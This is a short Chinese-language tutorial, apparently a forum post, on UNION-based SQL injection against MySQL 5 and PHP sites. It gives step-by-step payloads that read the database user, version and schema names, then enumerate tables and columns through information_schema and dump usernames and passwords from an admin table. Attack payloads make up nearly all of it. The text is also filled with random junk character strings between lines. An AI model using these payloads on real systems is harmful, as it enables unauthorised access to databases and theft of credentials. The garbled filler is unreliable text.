8 ^1 @4 J1 s; S& b教程内容:Mysql 5+php 注入
# i1 R# h) V! A; I7 n! B: E
7 \) m* f; ~ B8 C! G5 Y" O$ `- v3 I" ~" Z+ I3 y( m& `1 X) T
! Y+ C' \! I+ a) I) Y一.查看MYSQL基本信息(库名,版本,用户)7 g5 Y, y2 \, I3 D- B
6 }7 c! w5 {' i2 L
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
4 i7 ?) c3 p( ~: X' C! q. m7 b* I& r( k* Q5 h5 u3 x
二.查数据库
# H% Z/ i! ^$ t! u; U9 l; A
& v" a3 F% i% s& Y0 nand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*- G6 e5 i4 s- f3 ?
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。4 P. m- W' R4 r3 C# y, J9 X( H0 }1 k1 s
, x6 n O# Z: R! M三.暴表
/ ?& V: h8 z6 `
/ T d# M2 Y7 }: J8 k' X( Q+ uand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*& i1 j3 p: P% f- O
$ I+ ^! V' H2 G% Q% Q
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
: S# ~* D( Q, J! O& u0 N) Z- r5 p: ^% w$ T+ |' e
四.暴字段7 w2 T+ C) Z" H. Z1 C- D9 o
! }$ j5 i1 l% o3 X8 e2 p& Y# [0 d$ }
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*% Q- a8 B. T; V8 B* E& V! B
- d' r/ k* O- o a3 V4 A; P
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。7 b+ p" B3 [ |- M& N! t
" l0 ?. ~8 J) K3 Q五.暴数据7 E t! U8 |2 t3 u! b8 a7 Q
6 q2 g# a M/ G' e! M+ M
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*) B1 O$ ?& v& S0 o' ~, R% I
( r; c G' U' C+ u7 l! r' ~) i
$ X5 Y) e/ M! F% @6 s
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
^- H# Z3 G$ H+ Q6 F |